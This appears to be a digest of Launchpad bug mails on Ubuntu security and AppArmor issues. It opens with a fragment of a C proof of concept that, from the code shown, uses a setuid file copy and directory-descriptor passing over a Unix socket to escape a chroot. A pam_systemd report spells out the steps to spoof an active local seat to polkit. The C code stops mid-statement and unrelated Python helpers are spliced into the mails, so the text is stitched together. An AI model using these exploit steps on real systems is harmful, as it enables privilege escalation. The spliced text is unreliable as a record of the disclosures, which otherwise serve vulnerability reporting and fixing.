    }

    if (fchmod(dst_fd, 04755)) err(1, "fchmod");
    close(src_fd);
    close(dst_fd);

    // and that's it!
    puts("done!");
    while (1) pause();
    return 0;
  }
  user@deb10:~/systemd_uidleak$ gcc -o breakout_assisted breakout_assisted.c 
  user@deb10:~/systemd_uidleak$ cat > breakout_helper.c
  #define _GNU_SOURCE
  #include <stdio.h>
  #include <stdlib.h>
  #include <unistd.h>
  #include <fcntl.h>
  #include <err.h>
  #include <alloca.h>
  #include <sys/socket.h>
  #include <sys/un.h>

  int main(void) {
    int rootfd = open(".", O_PATH);
    if (rootfd < 0) err(1, "unable to open cwdfd");
    int s = socket(AF_UNIX, SOCK_DGRAM, 0);
    if (s < 0) err(1, "unable to create unix domain socket");
    struct sockaddr_un addr = {
      .sun_family = AF_UNIX,
      .sun_path = "\0breakout"
    };
    if (connect(s, (struct sockaddr *)&addr, sizeof(sa_family_t)+1+8))
      err(1, "unable to connect to abstract socket");
    puts("connected to other chroot, sending cwdfd...");

    int len = sizeof(struct cmsghdr) + sizeof(int);
    struct cmsghdr *hdr = alloca(len);
    *hdr = 
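
A defender-side check for the condition this report describes, as an added example that is not part of the bug report or of systemd: it walks a directory tree and flags regular files whose setuid or setgid bit hands out an ID from the range systemd allocates for DynamicUser=. The 61184-65519 range is taken from systemd's documentation and is assumed unchanged at build time; the function names and the default scan roots are hypothetical.

```python
"""Audit a directory tree for set-id files left behind by DynamicUser= services."""
import os
import stat
from typing import Callable, Iterator, NamedTuple

# Default UID/GID range systemd allocates DynamicUser= identities from
# (assumption: the distribution did not rebuild systemd with another range).
DYNAMIC_ID_MIN = 61184
DYNAMIC_ID_MAX = 65519


class Finding(NamedTuple):
    path: str
    uid: int
    gid: int
    mode: str


def in_dynamic_range(ident: int) -> bool:
    return DYNAMIC_ID_MIN <= ident <= DYNAMIC_ID_MAX


def is_dynamic_setid(st) -> bool:
    """True for a regular file whose set-id bit grants a dynamic UID or GID."""
    if not stat.S_ISREG(st.st_mode):
        return False
    suid = bool(st.st_mode & stat.S_ISUID) and in_dynamic_range(st.st_uid)
    sgid = bool(st.st_mode & stat.S_ISGID) and in_dynamic_range(st.st_gid)
    return suid or sgid


def scan(root: str, lstat: Callable = os.lstat) -> Iterator[Finding]:
    """Walk root without following symlinks and yield matching files.

    lstat is injectable so the logic can be exercised without root privileges.
    """
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in sorted(filenames):
            path = os.path.join(dirpath, name)
            try:
                st = lstat(path)
            except OSError:
                continue  # file vanished or is unreadable; skip it
            if is_dynamic_setid(st):
                yield Finding(path, st.st_uid, st.st_gid,
                              stat.filemode(st.st_mode))


if __name__ == "__main__":
    import sys
    # World-writable locations are where a collaborating process could
    # receive such a file; these defaults are illustrative.
    for scan_root in sys.argv[1:] or ["/tmp", "/var/tmp"]:
        for hit in scan(scan_root):
            print(f"{hit.mode} uid={hit.uid} gid={hit.gid} {hit.path}")
```

A hit means a recycled dynamic UID could later be assumed through that file, so it should be removed or have its set-id bits cleared once the owning service is confirmed gone.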

[Touch-packages] [Bug 1824724] Re: aa-logprof: german translation: ERROR: PromptUser: Ungültiges Tastenkürzel für V: Änderungen ansehen

2019-04-23 Thread Seth Arnold
** Also affects: language-pack-de-base (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to language-pack-de in
Ubuntu.
https://bugs.launchpad.net/bugs/1824724

Title:
  aa-logprof: german translation: ERROR: PromptUser: Ungültiges
  Tastenkürzel für V: Änderungen ansehen

Status in AppArmor:
  New
Status in Ubuntu Translations:
  New
Status in language-pack-de package in Ubuntu:
  New
Status in language-pack-de-base package in Ubuntu:
  New

Bug description:
  after the last Erl(a)uben [Allow] there's an error message:
  "ERROR: PromptUser: Ungültiges Tastenkürzel für V: Änderungen ansehen"
  see here:

  Profil:  /usr/bin/snap
  Pfad:/sys/kernel/security/apparmor/features/policy/versions/v5
  Neuer Modus: r
  Schweregrad: 4

   [1 - /sys/kernel/security/apparmor/features/policy/versions/v5 r,]
  Erl(a)uben / [A(b)lehnen] / (I)gnorieren / (G)lob / Glob with (E)xtension / (N)eu / Audi(t) / Abb(r)echen / En(d)e
  /sys/kernel/security/apparmor/features/policy/versions/v5 r, wird zum Profil hinzugefügt.

  ERROR: PromptUser: Ungültiges Tastenkürzel für V: Änderungen ansehen
  [view changes]

  imho it's a translation error.

To manage notifications about this bug go to:
https://bugs.launchpad.net/apparmor/+bug/1824724/+subscriptions



[Touch-packages] [Bug 1824724] Re: aa-logprof: german translation: ERROR: PromptUser: Ungültiges Tastenkürzel für V: Änderungen ansehen

2019-04-23 Thread Seth Arnold
Hello German translators, what's involved in fixing translations and
pushing an updated translation package to users? The new strings have
broken some AppArmor utilities.

I believe the lines that need fixing:

language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(V)iew Profile"
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"V: Profil ansehen"
--
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(U)se Profile"
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"U: Profil verwenden"
--
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(C)reate New Profile"
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"C: Neues Profil erstellen"
--
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(U)pdate Profile"
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"U: Profil aktualisieren"
--
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(I)gnore Update"
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"I: Aktualisierung ignorieren"
--
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(U)pload Changes"
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"U: Änderungen hochladen"
--
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(V)iew Changes"
language-pack-de_18.04+20190117/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"V: Änderungen ansehen"
--
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(V)iew Profile"
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"V: Profil ansehen"
--
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(U)se Profile"
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"U: Profil verwenden"
--
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(C)reate New Profile"
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"C: Neues Profil erstellen"
--
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(U)pdate Profile"
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"U: Profil aktualisieren"
--
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(I)gnore Update"
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"I: Aktualisierung ignorieren"
--
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(U)pload Changes"
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"U: Änderungen hochladen"
--
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po:msgid 
"(V)iew Changes"
language-pack-de_19.04+20190408/data/de/LC_MESSAGES/apparmor-utils.po-msgstr 
"V: Änderungen ansehen"

and

language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po:msgid
 "(V)iew Profile"
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po-msgstr
 "V: Profil ansehen"
--
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po:msgid
 "(U)se Profile"
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po-msgstr
 "U: Profil verwenden"
--
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po:msgid
 "(C)reate New Profile"
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po-msgstr
 "C: Neues Profil erstellen"
--
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po:msgid
 "(U)pdate Profile"
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po-msgstr
 "U: Profil aktualisieren"
--
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po:msgid
 "(I)gnore Update"
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po-msgstr
 "I: Aktualisierung ignorieren"
--
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po:msgid
 "(U)pload Changes"
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po-msgstr
 "U: Änderungen hochladen"
--
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po:msgid
 "(V)iew Changes"
language-pack-de-base_19.04+20190304/data/de/LC_MESSAGES/apparmor-utils.po-msgstr
 "V: Änderungen ansehen"
--
language-pack-de-base_19.04+20190412/data/de/LC_MESSAGES/apparmor-utils.po:msgid
 "(V)iew Profile"
language-pack-de-base_19.04+20190412/data/de/LC_MESSAGES/apparmor-utils.po-msgstr
 "V: Profil ansehen"
--
language-pack-de-base_19.04+20190412/data/de/LC_MESSAGES/apparmor-utils.po:msgid
 "(U)se Profile"
language-pack-de-base_19.04+20190412/data/de/LC_MESSAGES/apparmor-utils.po-msgstr
 "U: Profil verwenden"
--

[Touch-packages] [Bug 1824724] Re: aa-logprof: german translation: ERROR: PromptUser: Ungültiges Tastenkürzel für V: Änderungen ansehen

2019-04-23 Thread Seth Arnold
** Also affects: ubuntu-translations
   Importance: Undecided
   Status: New

** Changed in: ubuntu-translations
 Assignee: (unassigned) => Ubuntu German Translators (ubuntu-l10n-de)

** Also affects: language-pack-de (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to language-pack-de in
Ubuntu.
https://bugs.launchpad.net/bugs/1824724

Title:
  aa-logprof: german translation: ERROR: PromptUser: Ungültiges
  Tastenkürzel für V: Änderungen ansehen

Status in AppArmor:
  New
Status in Ubuntu Translations:
  New
Status in language-pack-de package in Ubuntu:
  New


To manage notifications about this bug go to:
https://bugs.launchpad.net/apparmor/+bug/1824724/+subscriptions



[Touch-packages] [Bug 1812316] Re: systemd: lack of seat verification in PAM module permits spoofing active session to polkit

2019-04-23 Thread Seth Arnold
** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1812316

Title:
  systemd: lack of seat verification in PAM module permits spoofing
  active session to polkit

Status in systemd package in Ubuntu:
  New

Bug description:
  [I am sending this bug report to Ubuntu as requested by systemd at
  
.]

  As documented at
  , for
  any action, a polkit policy can specify separate levels of required
  authentication based on whether a client is:

   - in an active session on a local console
   - in an inactive session on a local console
   - or neither

  This is expressed in the policy using the elements "allow_any",
  "allow_inactive" and "allow_active". Very roughly speaking, the idea here is
  to give special privileges to processes owned by users that are sitting
  physically in front of the machine (or at least, a keyboard and a screen that
  are connected to a machine), and restrict processes that e.g. belong to users
  that are ssh'ing into a machine.

  For example, the ability to refresh the system's package index is restricted
  this way using a policy in
  /usr/share/polkit-1/actions/org.freedesktop.packagekit.policy:


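  [...]
  <description>Refresh system repositories</description>
  [...]
  <message>Authentication is required to refresh the system repositories</message>
  [...]
  <defaults>
    <allow_any>auth_admin</allow_any>
    <allow_inactive>auth_admin</allow_inactive>
    <allow_active>yes</allow_active>
  </defaults>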


  
  On systems that use systemd-logind, polkit determines whether a session is
  associated with a local console by checking whether systemd-logind is tracking
  the session as being associated with a "seat". This happens through
  polkit_backend_session_monitor_is_session_local() in
  polkitbackendsessionmonitor-systemd.c, which calls sd_session_get_seat().
  The check whether a session is active works similarly.

  systemd-logind is informed about the creation of new sessions by the PAM
  module pam_systemd through a systemd message bus call from
  pam_sm_open_session() to method_create_session(). The RPC method trusts the
  information supplied to it, apart from some consistency checks; that is not
  directly a problem, since this RPC method can only be invoked by root.
  This means that the PAM module needs to ensure that it doesn't pass incorrect
  data to systemd-logind.

  Looking at the code in the PAM module, however, you can see that the seat name
  of the session and the virtual terminal number come from environment
  variables:

  seat = getenv_harder(handle, "XDG_SEAT", NULL);
  cvtnr = getenv_harder(handle, "XDG_VTNR", NULL);
  type = getenv_harder(handle, "XDG_SESSION_TYPE", type_pam);
  class = getenv_harder(handle, "XDG_SESSION_CLASS", class_pam);
  desktop = getenv_harder(handle, "XDG_SESSION_DESKTOP", desktop_pam);

  This is actually documented at
  
.

  After some fixup logic that is irrelevant here, this data is then passed to
  the RPC method.

  
  One quirk of this issue is that a new session is only created if the calling
  process is not already part of a session (based on the cgroups it is in,
  parsed from procfs). This means that an attacker can't simply ssh into a
  machine, set some environment variables, and then invoke a setuid binary that
  uses PAM (such as "su") because ssh already triggers creation of a session via
  PAM. But as it turns out, the systemd PAM module is only invoked for
  interactive sessions:

  # cat /usr/share/pam-configs/systemd
  Name: Register user sessions in the systemd control group hierarchy
  Default: yes
  Priority: 0
  Session-Interactive-Only: yes
  Session-Type: Additional
  Session:
  optional pam_systemd.so

  So, under the following assumptions:

   - we can run commands on the remote machine, e.g. via SSH
   - our account can be used with "su" (it has a password and isn't disabled)
   - the machine has no X server running and is currently displaying tty1, with
     a login prompt

  we can have our actions checked against the "allow_active" policies instead of
  the "allow_any" policies as follows:

   - SSH into the machine
   - use "at" to schedule a job in one minute that does the following:
     * wipe the environment
     * set XDG_SEAT=seat0 and XDG_VTNR=1
     * use "expect" to run "su -c {...} {our_username}" and enter our user's
       password
     * in the shell invoked by "su", perform the action we want to run under the
       "allow_active" policy

  
  I tested this in a Debian 10 VM, as follows ("{{{...}}}" have been replaced),
  after ensuring that no sessions are active and the VM's screen is showing the
  login prompt on 

Re: [Touch-packages] [Bug 1823985] Re: isc-dhcp-server can't load leases file with apparmor enabled

2019-04-10 Thread Seth Arnold
On Wed, Apr 10, 2019 at 08:34:47AM -, Lars wrote:
> [root@myhost:~]↥ 1 # namei -l /test/var/lib/dhcp/dhcpd.leases
> f: /test/var/lib/dhcp/dhcpd.leases
> drwxr-xr-x root  root  /
> drwxr-xr-x dhcpd dhcpd test
> drwxr-xr-x dhcpd dhcpd var
> drwxr-xr-x dhcpd dhcpd lib
> drwxr-xr-x dhcpd dhcpd dhcp
> -rw-r--r-- dhcpd dhcpd dhcpd.leases

Note that these permissions don't allow root to write to this file UNLESS
root uses the CAP_DAC_OVERRIDE permission.

Thanks.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to isc-dhcp in Ubuntu.
https://bugs.launchpad.net/bugs/1823985

Title:
  isc-dhcp-server can't load leases file with apparmor enabled

Status in isc-dhcp package in Ubuntu:
  New

Bug description:
  I can't start isc-dhcp-server with apparmor enabled.

  I set a custom leases file in the dhcpd.conf:
   lease-file-name "/test/var/lib/dhcp/dhcpd.leases";

  and created a custom apparmor profile for that in /etc/apparmor.d/local/usr.sbin.dhcpd:
  /test/var/lib/dhcp/dhcpd{,6}.leases* lrw,

  But when I try to start I see the following errors from dhcpd:

  Internet Systems Consortium DHCP Server 4.3.5
  Copyright 2004-2016 Internet Systems Consortium.
  All rights reserved.
  For info, please visit https://www.isc.org/software/dhcp/
  Config file: /etc/dhcp/dhcpd.conf
  Database file: /test/var/lib/dhcp/dhcpd.leases
  PID file: /run/dhcp-server/dhcpd.pid
  Can't open /test/var/lib/dhcp/dhcpd.leases for append.

  If you think you have received this message due to a bug rather
  than a configuration issue please read the section on submitting
  bugs on either our web page at www.isc.org or in the README file
  before submitting a bug.  These pages explain the proper
  process and the information we find helpful for debugging..

  exiting.

  
  And in the messages log I can see errors like this:

  Apr  9 17:07:03.601 myhost dhcpd[27361]: Can't open /test/var/lib/dhcp/dhcpd.leases for append.
  Apr  9 17:07:03.601 myhost dhcpd[27361]:
  Apr  9 17:07:03.601 myhost dhcpd[27361]: If you think you have received this message due to a bug rather
  Apr  9 17:07:03.601 myhost dhcpd[27361]: than a configuration issue please read the section on submitting
  Apr  9 17:07:03.601 myhost dhcpd[27361]: bugs on either our web page at www.isc.org or in the README file
  Apr  9 17:07:03.601 myhost dhcpd[27361]: before submitting a bug.  These pages explain the proper
  Apr  9 17:07:03.601 myhost dhcpd[27361]: process and the information we find helpful for debugging..
  Apr  9 17:07:03.601 myhost dhcpd[27361]:
  Apr  9 17:07:03.601 myhost dhcpd[27361]: exiting.
  Apr  9 17:07:03.603 myhost kernel: audit: type=1400 audit(1554822423.596:221): apparmor="DENIED" operation="capable" profile="/usr/sbin/dhcpd" pid=27361 comm="dhcpd" capability=1  capname="dac_override"
  Apr  9 17:07:03.603 myhost kernel: audit: type=1400 audit(1554822423.596:221): apparmor="DENIED" operation="capable" profile="/usr/sbin/dhcpd" pid=27361 comm="dhcpd" capability=1  capname="dac_override"



  After disabling apparmor for dhcpd everything works as expected:

  ln -s /etc/apparmor.d/usr.sbin.dhcpd /etc/apparmor.d/disable/
  apparmor_parser -R /etc/apparmor.d/usr.sbin.dhcpd

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/isc-dhcp/+bug/1823985/+subscriptions
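
The reasoning in this message, as an added example that is not code from the thread or from AppArmor: it parses the audit denial and the `namei -l` listing quoted above (both embedded as sample input with the mail line wraps rejoined) and reports which path component fails a plain owner/group/other check for a given user. The function names are hypothetical, and treating root as a member of group root only is an assumption.

```python
"""Explain an AppArmor dac_override denial using a namei -l listing."""
import re
from typing import Dict, List, NamedTuple, Set, Tuple

# Sample input copied from the thread above (hard line wraps rejoined).
AUDIT_LINE = (
    'audit: type=1400 audit(1554822423.596:221): apparmor="DENIED" '
    'operation="capable" profile="/usr/sbin/dhcpd" pid=27361 '
    'comm="dhcpd" capability=1  capname="dac_override"'
)
NAMEI_LISTING = """\
f: /test/var/lib/dhcp/dhcpd.leases
drwxr-xr-x root  root  /
drwxr-xr-x dhcpd dhcpd test
drwxr-xr-x dhcpd dhcpd var
drwxr-xr-x dhcpd dhcpd lib
drwxr-xr-x dhcpd dhcpd dhcp
-rw-r--r-- dhcpd dhcpd dhcpd.leases
"""


class Entry(NamedTuple):
    mode: str   # ten-character mode string, e.g. "drwxr-xr-x"
    owner: str
    group: str
    name: str


def parse_denial(line: str) -> Dict[str, str]:
    """Return the key=value fields of a kernel audit line, quotes removed."""
    fields = {}
    for key, quoted, bare in re.findall(r'(\w+)=(?:"([^"]*)"|(\S+))', line):
        fields[key] = quoted or bare
    return fields


def parse_namei(listing: str) -> List[Entry]:
    """Parse `namei -l` output into one Entry per path component."""
    entries = []
    for raw in listing.splitlines():
        if not raw.strip() or raw.startswith("f:"):
            continue  # skip blanks and the "f: <path>" header line
        mode, owner, group, name = raw.split(None, 3)
        entries.append(Entry(mode, owner, group, name))
    return entries


def dac_permits(entry: Entry, user: str, groups: Set[str], perm: str) -> bool:
    """Classic mode-bit check with no capabilities: exactly one triad applies."""
    if user == entry.owner:
        triad = entry.mode[1:4]
    elif entry.group in groups:
        triad = entry.mode[4:7]
    else:
        triad = entry.mode[7:10]
    allowed = {"r": "r", "w": "w", "x": "xst"}[perm]  # s/t imply x is set
    return triad["rwx".index(perm)] in allowed


def dac_failures(entries: List[Entry], user: str, groups: Set[str],
                 file_perms: str = "rw") -> List[Tuple[str, str]]:
    """List (component, permission) pairs the user lacks along the path."""
    *dirs, leaf = entries
    failures = [(d.name, "x") for d in dirs
                if not dac_permits(d, user, groups, "x")]
    failures += [(leaf.name, p) for p in file_perms
                 if not dac_permits(leaf, user, groups, p)]
    return failures


def explain(denial: Dict[str, str], entries: List[Entry],
            user: str, groups: Set[str]) -> str:
    if denial.get("capname") != "dac_override":
        return "denial is not about dac_override"
    failures = dac_failures(entries, user, groups)
    if not failures:
        return f"{user} passes the mode-bit checks on every component"
    missing = ", ".join(f"'{perm}' on {name}" for name, perm in failures)
    return (f"{denial['profile']} running as {user} lacks {missing}; fix "
            "ownership/modes or add 'capability dac_override,' to the profile")


if __name__ == "__main__":
    print(explain(parse_denial(AUDIT_LINE), parse_namei(NAMEI_LISTING),
                  "root", {"root"}))
```

With the listing above, root falls into the "other" class on dhcpd.leases and so lacks write access, while the dhcpd user passes every check.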



Re: [Touch-packages] [Bug 1823985] [NEW] isc-dhcp-server can't load leases file with apparmor enabled

2019-04-09 Thread Seth Arnold
On Tue, Apr 09, 2019 at 03:15:26PM -, Lars wrote:
> I set a custom leases file in the dhcpd.conf:
>  lease-file-name "/test/var/lib/dhcp/dhcpd.leases";
> 
> and created a custom apparmor profile for that in 
> /etc/apparmor.d/local/usr.sbin.dhcpd:
> /test/var/lib/dhcp/dhcpd{,6}.leases* lrw,
> 
> But when I try to start I see the following errors from dhcpd:

> Apr  9 17:07:03.603 myhost kernel: audit: type=1400 
> audit(1554822423.596:221): apparmor="DENIED" operation="capable" 
> profile="/usr/sbin/dhcpd" pid=27361 comm="dhcpd" capability=1  
> capname="dac_override"
> Apr  9 17:07:03.603 myhost kernel: audit: type=1400 
> audit(1554822423.596:221): apparmor="DENIED" operation="capable" 
> profile="/usr/sbin/dhcpd" pid=27361 comm="dhcpd" capability=1  
> capname="dac_override"

Hello Lars, this is indicating that the dhcpd service is trying to use
root's capability to bypass permissions to use this file. I suggest
checking the owner, group, and permissions of all directories and the
lease file. (namei -l /test/var/lib/dhcp/dhcpd.leases can be handy
for this.)

If all those owners and permissions are as you intended and you want the
dhcpd service to use root powers to access the file, then you'll also need
to modify the profile to allow the dhcpd daemon to use the dac_override:

  capability dac_override,

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to isc-dhcp in Ubuntu.
https://bugs.launchpad.net/bugs/1823985

Title:
  isc-dhcp-server can't load leases file with apparmor enabled

Status in isc-dhcp package in Ubuntu:
  New

Bug description:
  I can't start isc-dhcp-server with apparmor enabled.

  I set a custom leases file in the dhcpd.conf:
   lease-file-name "/test/var/lib/dhcp/dhcpd.leases";

  and created a custom apparmor profile for that in /etc/apparmor.d/local/usr.sbin.dhcpd:
  /test/var/lib/dhcp/dhcpd{,6}.leases* lrw,

  But when I try to start I see the following errors from dhcpd:

  Internet Systems Consortium DHCP Server 4.3.5
  Copyright 2004-2016 Internet Systems Consortium.
  All rights reserved.
  For info, please visit https://www.isc.org/software/dhcp/
  Config file: /etc/dhcp/dhcpd.conf
  Database file: /test/var/lib/dhcp/dhcpd.leases
  PID file: /run/dhcp-server/dhcpd.pid
  Can't open /test/var/lib/dhcp/dhcpd.leases for append.

  If you think you have received this message due to a bug rather
  than a configuration issue please read the section on submitting
  bugs on either our web page at www.isc.org or in the README file
  before submitting a bug.  These pages explain the proper
  process and the information we find helpful for debugging..

  exiting.

  
  And in the messages log I can see errors like this:

  Apr  9 17:07:03.601 myhost dhcpd[27361]: Can't open /test/var/lib/dhcp/dhcpd.leases for append.
  Apr  9 17:07:03.601 myhost dhcpd[27361]:
  Apr  9 17:07:03.601 myhost dhcpd[27361]: If you think you have received this message due to a bug rather
  Apr  9 17:07:03.601 myhost dhcpd[27361]: than a configuration issue please read the section on submitting
  Apr  9 17:07:03.601 myhost dhcpd[27361]: bugs on either our web page at www.isc.org or in the README file
  Apr  9 17:07:03.601 myhost dhcpd[27361]: before submitting a bug.  These pages explain the proper
  Apr  9 17:07:03.601 myhost dhcpd[27361]: process and the information we find helpful for debugging..
  Apr  9 17:07:03.601 myhost dhcpd[27361]:
  Apr  9 17:07:03.601 myhost dhcpd[27361]: exiting.
  Apr  9 17:07:03.603 myhost kernel: audit: type=1400 audit(1554822423.596:221): apparmor="DENIED" operation="capable" profile="/usr/sbin/dhcpd" pid=27361 comm="dhcpd" capability=1  capname="dac_override"
  Apr  9 17:07:03.603 myhost kernel: audit: type=1400 audit(1554822423.596:221): apparmor="DENIED" operation="capable" profile="/usr/sbin/dhcpd" pid=27361 comm="dhcpd" capability=1  capname="dac_override"



  After disabling apparmor for dhcpd everything works as expected:

  ln -s /etc/apparmor.d/usr.sbin.dhcpd /etc/apparmor.d/disable/
  apparmor_parser -R /etc/apparmor.d/usr.sbin.dhcpd

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/isc-dhcp/+bug/1823985/+subscriptions

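The ownership check suggested in the reply above, as an added example (not code from the thread or from AppArmor): it pulls denied capabilities out of the audit record quoted in the report, then walks a path component by component, as `namei -l` lists it, and reports each component whose mode bits would refuse a given uid without CAP_DAC_OVERRIDE. The temporary directory tree, the `base` parameter and the stand-in uid are constructed for the demonstration; ACLs are ignored.

```python
import os
import re
import shutil
import stat
import tempfile

# Audit record quoted in the report (the mail wrapped it; it is one line).
SAMPLE_AUDIT = (
    'Apr  9 17:07:03.603 myhost kernel: audit: type=1400 '
    'audit(1554822423.596:221): apparmor="DENIED" operation="capable" '
    'profile="/usr/sbin/dhcpd" pid=27361 comm="dhcpd" capability=1  '
    'capname="dac_override"'
)
_FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')
_BITS = (("r", 4), ("w", 2), ("x", 1))


def denied_capabilities(lines):
    """Return {(profile, capname)} for every denied capability request."""
    found = set()
    for line in lines:
        f = {k: v.strip('"') for k, v in _FIELD.findall(line)}
        if f.get("apparmor") == "DENIED" and f.get("operation") == "capable":
            found.add((f.get("profile"), f.get("capname")))
    return found


def _granted(st, uid, gids):
    """rwx bits the plain mode-bit check grants: owner, else group, else other."""
    if st.st_uid == uid:
        return (st.st_mode >> 6) & 7
    if st.st_gid in gids:
        return (st.st_mode >> 3) & 7
    return st.st_mode & 7


def dac_blockers(path, uid, gids, want="rw", base=os.sep):
    """List components below `base` whose mode bits refuse uid/gids.

    Directories need search (x); the final component needs `want`.
    Capabilities and ACLs are ignored on purpose, so the result is what a
    process gets without CAP_DAC_OVERRIDE. Each entry is
    (path, owner uid, owner gid, mode string, missing bits).
    Raises FileNotFoundError if a component does not exist.
    """
    need_final = sum(bit for ch, bit in _BITS if ch in want)
    parts = os.path.relpath(os.path.abspath(path), base).split(os.sep)
    blockers, current = [], base
    for i, part in enumerate(parts):
        current = os.path.join(current, part)
        st = os.stat(current)
        need = need_final if i == len(parts) - 1 else 1
        lacking = need & ~_granted(st, uid, set(gids))
        if lacking:
            missing = "".join(ch for ch, bit in _BITS if lacking & bit)
            blockers.append((current, st.st_uid, st.st_gid,
                             stat.filemode(st.st_mode), missing))
    return blockers


def demo():
    """Constructed tree shaped like the lease path in the report."""
    base = tempfile.mkdtemp()
    current = base
    for part in ("test", "var", "lib", "dhcp"):
        current = os.path.join(current, part)
        os.mkdir(current)
        os.chmod(current, 0o755)
    lease = os.path.join(current, "dhcpd.leases")
    open(lease, "w").close()
    os.chmod(lease, 0o644)
    owner = os.stat(lease).st_uid
    other = owner + 1  # stand-in uid that owns nothing in the tree
    as_owner = dac_blockers(lease, owner, [], "rw", base)
    as_other = dac_blockers(lease, other, [], "rw", base)
    os.chmod(current, 0o750)  # now the directory itself refuses search
    locked_dir = dac_blockers(lease, other, [], "rw", base)
    shutil.rmtree(base)
    return {
        "owner": [b[4] for b in as_owner],
        "other": [(os.path.basename(b[0]), b[3], b[4]) for b in as_other],
        "locked_dir": [(os.path.basename(b[0]), b[4]) for b in locked_dir],
    }


if __name__ == "__main__":
    print(denied_capabilities([SAMPLE_AUDIT]))
    print(demo())
```

On a real host, call `dac_blockers("/test/var/lib/dhcp/dhcpd.leases", 0, [0])` to see which component makes a root-run dhcpd ask for dac_override.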


[Touch-packages] [Bug 1794629] Re: CVE-2018-15473 - User enumeration vulnerability

2019-04-08 Thread Seth Arnold
Vital, just scanning version banners is what leads to this problem.
Inspecting the package database would be far more reliable.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1794629

Title:
  CVE-2018-15473 - User enumeration vulnerability

Status in openssh package in Ubuntu:
  Fix Released
Status in openssh source package in Trusty:
  Fix Released
Status in openssh source package in Xenial:
  Fix Released
Status in openssh source package in Bionic:
  Fix Released
Status in openssh source package in Cosmic:
  Fix Released

Bug description:
  https://nvd.nist.gov/vuln/detail/CVE-2018-15473

  OpenSSH through 7.7 is prone to a user enumeration vulnerability due
  to not delaying bailout for an invalid authenticating user until after
  the packet containing the request has been fully parsed, related to
  auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.

  Fixed in Debian: https://www.debian.org/security/2018/dsa-4280

  Currently pending triage? https://people.canonical.com/~ubuntu-
  security/cve/2018/CVE-2018-15473.html

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1794629/+subscriptions



[Touch-packages] [Bug 1794629] Re: CVE-2018-15473 - User enumeration vulnerability

2019-04-08 Thread Seth Arnold
Root, that script is suitable for timing attacks against ssh. This issue
is easier to use to enumerate users, but does require a different
approach. There was a tool posted to oss-security for this:
https://www.openwall.com/lists/oss-security/2018/08/16/1

Thanks

-- 
